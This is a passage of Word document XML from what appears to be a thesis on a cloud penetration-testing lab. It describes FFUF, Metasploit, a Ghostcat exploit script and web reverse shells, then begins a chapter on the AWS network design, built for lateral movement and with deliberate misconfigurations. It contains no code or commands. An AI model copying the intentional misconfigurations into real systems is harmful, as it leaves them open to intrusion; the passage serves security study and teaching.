          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE900F" w14:textId="642BDDD9" w:rsidR="00611E94" w:rsidRPr="00D77DFE" w:rsidRDefault="00611E94" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>FFUF is an open-source web fuzzing tool used to discover hidden directories, files, and endpoints in web applications by sending requests based on a user-defined wordlist. Tools of this type are commonly referred to as fuzzers. FFUF supports both GET and POST requests to validate discovered endpoints and is written in the Go programming language.</w:t>
      </w:r>
      <w:bookmarkStart w:id="59" w:name="paragraph29"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource29" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>[29]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="5261791B" w14:textId="152AF3CB" w:rsidR="00611E94" w:rsidRPr="00D77DFE" w:rsidRDefault="00611E94" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The Metasploit Framework is an open-source penetration testing platform that provides a wide range of exploits, payloads, auxiliary modules, and post-exploitation tools. It supports all phases of penetration testing, from reconnaissance and scanning to exploitation and post-exploitation, including credential harvesting and data extraction. The framework is primarily written in Ruby and was acquired by Rapid7 in 2007. </w:t>
      </w:r>
      <w:bookmarkStart w:id="60" w:name="paragraph30"/>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"resource30"</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Pr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[30]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A4149" w14:textId="6B5ADEC8" w:rsidR="00AE0FF7" w:rsidRPr="00D77DFE" w:rsidRDefault="00F9649A" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>AJP</w:t>
      </w:r>
      <w:r w:rsidR="004700D3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Apache JServ Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shooter (CVE-2020-1938) is an open-source Python script designed to exploit the Ghostcat vulnerability in Apache Tomcat. This vulnerability allows unauthenticated attackers to read or write files within specific directories of the target web application through the AJP connector. AJP Shooter is commonly used as a proof of concept in penetration testing reports to demonstrate the impact of this vulnerability. </w:t>
      </w:r>
      <w:bookmarkStart w:id="61" w:name="paragraph31"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource31"</w:instrText>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[31]</w:t>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003D48D5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="671A0B68" w14:textId="0E5BE8F2" w:rsidR="005B4E26" w:rsidRPr="00D77DFE" w:rsidRDefault="004E1414" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>A web reverse shell is a malicious script that forces a vulnerable system to initiate a shell connection back to the attacker’s machine, providing the attacker with remote command-line access to the compromised host and serving as an initial access point for further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB98BB4" w14:textId="77777777" w:rsidR="00024908" w:rsidRDefault="00024908" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc223521101"/>
    </w:p>
    <w:p w14:paraId="05501F19" w14:textId="77777777" w:rsidR="004602CA" w:rsidRDefault="004602CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31CF30" w14:textId="1E56DC5A" w:rsidR="008478B2" w:rsidRPr="00D77DFE" w:rsidRDefault="0073667C" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00D136A7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ENVIRONMENT CONFIGURATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:r w:rsidR="00D136A7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C16F96C" w14:textId="3A15A763" w:rsidR="009E776C" w:rsidRPr="00D77DFE" w:rsidRDefault="009E776C" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc223521102"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.1 Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="48DA0C40" w14:textId="627CEB5D" w:rsidR="00B2700C" w:rsidRPr="00D77DFE" w:rsidRDefault="0073667C" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>What network components are required to simulate these scenarios? How should inbound and outbound rules be configured in subnets, and what additional configurations are necessary? This chapter describes how the testing environment was configured in the project presented in this thesis, from a cloud and infrastructure perspective, including the deployment of AWS instances. It covers AWS networking configurations, detailing the network components and settings used in the environment. The chapter also discusses AWS security configurations, including inbound and outbound rules. Finally, it explains the instance-level setup, outlining the tools used, the functionalities implemented in the custom web applications, and the intentional Linux system misconfigurations introduced to simulate real-world attack scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC61D3" w14:textId="3CC7ED51" w:rsidR="008478B2" w:rsidRPr="00D77DFE" w:rsidRDefault="008478B2" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc223521103"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E07016" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9163F" w14:textId="02A3E032" w:rsidR="0073667C" w:rsidRPr="00D77DFE" w:rsidRDefault="0073667C" w:rsidP="0073667C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc223521104"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.1 Architecture Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="243DDEC3" w14:textId="0E72D831" w:rsidR="0073667C" w:rsidRPr="00D77DFE" w:rsidRDefault="0073667C" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Before examining the detailed configuration of individual components, it is essential to understand the overall architecture of the testing environment and the purpose of each element within the system. This subsection provides a high-level overview of the adopted architecture, explaining the design decisions, component roles, and the relationship between different parts of the infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E1FEA8" w14:textId="77777777" w:rsidR="00B8099D" w:rsidRPr="00D77DFE" w:rsidRDefault="00B8099D" w:rsidP="00B8099D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E5BC677" wp14:editId="71D97C06">
            <wp:extent cx="5571490" cy="4791075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="187802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1615" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5587950" cy="4805229"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F356FC" w14:textId="5FD7E10D" w:rsidR="00B8099D" w:rsidRPr="00D77DFE" w:rsidRDefault="00B8099D" w:rsidP="00B8099D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.1: Topology for network components in AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595CE739" w14:textId="77777777" w:rsidR="00B8099D" w:rsidRPr="00D77DFE" w:rsidRDefault="00B8099D" w:rsidP="00B8099D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1F6247" w14:textId="1C85C05E" w:rsidR="00B8099D" w:rsidRPr="00D77DFE" w:rsidRDefault="00B8099D" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The Figure 4.1 above shows the network topology and AWS components used in the penetration testing simulation project. The environment is built within a Virtual Private Cloud, which provides a logically isolated network and defines the overall IP addressing and routing structure. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A1F33" w14:textId="6B5DA2C4" w:rsidR="00B8099D" w:rsidRPr="00D77DFE" w:rsidRDefault="00B8099D" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Subnets are used to segment the VPC into smaller network zones, serving a role conceptually like VLANs (Virtual Local Area Network) in traditional on-premises networks, although their implementation and management differ. Each EC2 instance is associated with a dedicated Security Group, which represents a stateful firewall to control the inbound and outbound network traffic at the instance level. This configuration allows accurate access control and plays a significant role in the security posture in the simulated environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7981DEC9" w14:textId="77777777" w:rsidR="00B8099D" w:rsidRPr="00D77DFE" w:rsidRDefault="00B8099D" w:rsidP="0073667C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051E61AF" w14:textId="57A18400" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc223521105"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.1.1 Architecture Design and Objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="17373336" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The testing environment was designed to simulate a realistic enterprise cloud infrastructure that would enable comprehensive penetration testing scenarios, including reconnaissance, exploitation, privilege escalation, lateral movement, and network pivoting. The architecture follows a segmented network design pattern commonly found in production environments, where different network zones are isolated from each other while maintaining controlled communication paths. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BF44FB" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The primary objectives of this architecture are: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE0957" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Realistic Attack Surface: Create an environment that mirrors real-world cloud deployments with multiple network segments, internet-facing services, and internal resources </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF5C1B" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral Movement Scenarios: Enable testing of multi-stage attacks that require pivoting between network segments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADE4A4" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Segmentation Testing: Validate the effectiveness of network access controls and demonstrate common misconfigurations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ADEBEC" w14:textId="24946D02" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Scalable Design: Provide a foundation that can be easily extended with additional subnets, instances, or security controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2540971A" w14:textId="77777777" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00E7663C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc223521106"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
